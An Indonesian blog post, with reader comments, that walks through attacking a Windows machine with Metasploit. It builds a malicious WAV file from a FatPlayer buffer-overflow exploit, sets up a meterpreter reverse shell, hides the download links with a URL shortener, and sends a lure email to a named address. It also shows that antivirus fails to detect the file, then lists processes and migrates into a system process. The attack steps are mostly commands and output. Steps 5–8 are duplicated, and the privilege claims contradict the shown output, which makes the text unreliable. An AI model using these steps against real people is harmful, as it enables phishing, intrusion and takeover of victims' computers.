Kali ini adalah pertandingan antara:
Metasploit
VS
Firewall dan AVIRA
Dalam keadaan ini, attacker tidak dapat melakukan proses ping ke target (karena firewall). Dan attacker tidak bisa mengirim payload Trojan karena adanya antivirus. AVIRA sudah di update dengan versi terbaru (cek screen shoot). Kali ini saya akan mencoba menyerang system dengan memanfaatkan celah buffer overflow pada fatplayer versi 0.6 (terbaru).
Preparation:
- Metasploit
- Apache2
- URL Shortener
- sendEmail
Briefing:
- Buat file bertipe wav dengan exploit/windows/fileformat/fatplayer_wav
- Pindahkan file tersebut ke direktori /var/www
- Jalankan service Apache2
- Gunakan URL shortener
- Jalankan exploit/multi/handler
- Kirim Email ke korban
- Korban mendownload file dan memainkan file tersebut
- Game Over
1. Buat file bertipe wav dengan exploit/windows/fileformat/fatplayer_wav
Buka terminal, lalu masukan perintah:
root@red-dragon:~# msfconsole
Dalam konsol msf, masukan perintah:
msf > use exploit/windows/fileformat/fatplayer_wav
msf exploit(fatplayer_wav) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(fatplayer_wav) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(fatplayer_wav) > set LPORT 4444
LPORT => 4444
msf exploit(fatplayer_wav) > set FILENAME GarudaDiDadaku.wav
FILENAME => GarudaDiDadaku.wav
msf exploit(fatplayer_wav) > exploit
[*] Creating 'GarudaDiDadaku.wav' file ...
[+] GarudaDiDadaku.wav stored at /root/.msf4/local/GarudaDiDadaku.wav
2. Pindahkan file tersebut ke direktori /var/www
Buka terminal, lalu masukan peritah:
root@red-dragon:~# cp /root/.msf4/local/GarudaDiDadaku.wav /var/www/GarudaDiDadaku.wav
3. Jalankan service Apache2
Buka terminal, lalu masukan perintah:
root@red-dragon:~# /etc/init.d/apache2 restart
web server apache2 ... waiting . [ OK ]
4. Gunakan URL shortener
Gunakan URL shortener untuk membungkus link yang mencurigakan kepada korban. Kali ii saya menggunakan URL Shortener yang disediakan oleh Google. Yaitu http://goo.gl
Kali ini saya akan memperpendek url http://sourceforge.net/projects/fatplayer/files/Fat%20Player/Fat%20Player%200.6b/FatPlayer_06b_Win32.exe/download dan http://192.168.1.5/GarudaDiDadaku.wav
Hasilnya:
Dan
5. Jalankan exploit/multi/handler
Kembali ke konsol metasploit, dan masukan perintah:
msf exploit(fatplayer_wav) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.5:4444
[*] Starting the payload handler...
msf exploit(handler) >
6. Kirim Email ke korban
Setelah exploit multi handler berjalan, sekarang saatnya memancing korban kita untuk mendownload file yang berisi exploit untuk mengambil alih system. Buka terminal, dan masukan perintah:
root@red-dragon:~# sendEmail -f "Attacker<badguy@internet.com>" -t hanggara33@gmail.com -u "Lagu baru Garuda Di dadaku" -m "Lagu Garuda di dadaku diaransemen ulang nih sama NETRAL. Download playernya di http://goo.gl/oKUHA kemudian download filenya di http://goo.gl/QIFuh" -s smtp.gmail.com:587 -xu doubledragon666@gmail.com -xp xxxxxxx
Keterangan:
-f adalah inisial pengirim email
-t adalah target
-u adalah subject email
-m adalah isi pesan
-s adalah server email
-xu adalah account email attacker
-xp adalah password account email attacker
7. Korban mendownload file dan memainkan file tersebut
Sambil menunggu korban, mari kita lihat apa yang terjadi dengan korban kita.
korban: "Oh my God. Saya dapat email...."
Kemudian korban mendownload fatplayer, dan file exploit yang kita buat.
Karena curiga file tersebut hanya sebesar 4 KB. Korban memindai file tersebut dengan antivirus AVIRA yang baru diupdate.
Setelah scan selesai, AVIRA menyatakan bahwa file terbebas dari virus, dan korban memainkan lagu tersebut dengan fatplayer.
Tidak terjadi apa-apa....
8. Game Over
Mari kita cek metasploit kita.
Kemudian kita cek informasi system dan jabatan kita di dalam system, dengan perintah sysinfo kemudian getuid
Omong kosong! Saya ingin menjadi NT AUTHORITY\NETWORK SERVICE di sini. Saya akan melakukan migrasi ke sebuah proses yang dijalankan oleh NT AUTHORITY\NETWORK SERVICE. Untuk melakukan migrasi, kita harus mengetahui process ID yang dijalankan oleh NT AUTHORITY\NETWORK SERVICE. Masukan perintah ps.
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1148 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1276 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1388 explorer.exe x86 0 ROOT-11E5DB48A8\Administrator C:\WINDOWS\Explorer.EXE
1532 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1592 sched.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
1704 VMwareTray.exe x86 0 ROOT-11E5DB48A8\Administrator C:\Program Files\VMware\VMware Tools\VMwareTray.exe
1712 vmtoolsd.exe x86 0 ROOT-11E5DB48A8\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1720 rundll32.exe x86 0 ROOT-11E5DB48A8\Administrator C:\WINDOWS\system32\rundll32.exe
1728 avgnt.exe x86 0 ROOT-11E5DB48A8\Administrator C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
1948 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
1996 avguard.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
2008 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
2760 TPAutoConnect.exe x86 0 ROOT-11E5DB48A8\Administrator C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
3080 FatPlayer.exe x86 0 ROOT-11E5DB48A8\Administrator C:\Documents and Settings\Administrator\My Documents\Downloads\FatPlayer 0.6b\FatPlayer.exe
3124 wuauclt.exe x86 0 ROOT-11E5DB48A8\Administrator C:\WINDOWS\system32\wuauclt.exe
4 System x86 0
452 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
540 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
604 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
628 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
680 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
692 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
844 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
856 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
964 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
Kembali ke konsol metasploit, dan masukan perintah:
msf exploit(fatplayer_wav) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.5:4444
[*] Starting the payload handler...
msf exploit(handler) >
6. Kirim Email ke korban
Setelah exploit multi handler berjalan, sekarang saatnya memancing korban kita untuk mendownload file yang berisi exploit untuk mengambil alih system. Buka terminal, dan masukan perintah:
root@red-dragon:~# sendEmail -f "Attacker<badguy@internet.com>" -t hanggara33@gmail.com -u "Lagu baru Garuda Di dadaku" -m "Lagu Garuda di dadaku diaransemen ulang nih sama NETRAL. Download playernya di http://goo.gl/oKUHA kemudian download filenya di http://goo.gl/QIFuh" -s smtp.gmail.com:587 -xu doubledragon666@gmail.com -xp xxxxxxx
Keterangan:
-f adalah inisial pengirim email
-t adalah target
-u adalah subject email
-m adalah isi pesan
-s adalah server email
-xu adalah account email attacker
-xp adalah password account email attacker
7. Korban mendownload file dan memainkan file tersebut
Sambil menunggu korban, mari kita lihat apa yang terjadi dengan korban kita.
korban: "Oh my God. Saya dapat email...."
Kemudian korban mendownload fatplayer, dan file exploit yang kita buat.
Karena curiga file tersebut hanya sebesar 4 KB. Korban memindai file tersebut dengan antivirus AVIRA yang baru diupdate.
Setelah scan selesai, AVIRA menyatakan bahwa file terbebas dari virus, dan korban memainkan lagu tersebut dengan fatplayer.
Tidak terjadi apa-apa....
8. Game Over
Mari kita cek metasploit kita.
Kemudian kita cek informasi system dan jabatan kita di dalam system, dengan perintah sysinfo kemudian getuid
Omong kosong! Saya ingin menjadi NT AUTHORITY\NETWORK SERVICE di sini. Saya akan melakukan migrasi ke sebuah proses yang dijalankan oleh NT AUTHORITY\NETWORK SERVICE. Untuk melakukan migrasi, kita harus mengetahui process ID yang dijalankan oleh NT AUTHORITY\NETWORK SERVICE. Masukan perintah ps.
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1148 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1276 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1388 explorer.exe x86 0 ROOT-11E5DB48A8\Administrator C:\WINDOWS\Explorer.EXE
1532 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1592 sched.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
1704 VMwareTray.exe x86 0 ROOT-11E5DB48A8\Administrator C:\Program Files\VMware\VMware Tools\VMwareTray.exe
1712 vmtoolsd.exe x86 0 ROOT-11E5DB48A8\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1720 rundll32.exe x86 0 ROOT-11E5DB48A8\Administrator C:\WINDOWS\system32\rundll32.exe
1728 avgnt.exe x86 0 ROOT-11E5DB48A8\Administrator C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
1948 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
1996 avguard.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
2008 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
2760 TPAutoConnect.exe x86 0 ROOT-11E5DB48A8\Administrator C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
3080 FatPlayer.exe x86 0 ROOT-11E5DB48A8\Administrator C:\Documents and Settings\Administrator\My Documents\Downloads\FatPlayer 0.6b\FatPlayer.exe
3124 wuauclt.exe x86 0 ROOT-11E5DB48A8\Administrator C:\WINDOWS\system32\wuauclt.exe
4 System x86 0
452 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
540 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
604 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
628 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
680 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
692 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
844 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
856 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
964 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
Kemudian migrasi ke process 964, yaitu process svchost.exe yang dijalankan oleh NT AUTHORITY\SYSTEM .
meterpreter > migrate 964
[*] Migrating to 964...
[*] Migration completed successfully.
meterpreter >
Kemudian cek kembali jabatan kita di dalam system tersebut dengan perintah getuid.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter >
GAME OVER
Kita mendapatkan jabatan tertinggi untuk mengendalikan system korban.
=)
Originally created by:
red-dragon
Supported by:
Blue Dragon
Loved By:
Yoshephine Handini
Thanks to my Followers.
terus cara bertahannya gimana mas?
ReplyDeletecara untuk menangkal serangan ini
Pakai linux =)
Deletemantap bang... bahas juga bang tetang exploit di android, dari sending payload sampe tanem backdoor
ReplyDelete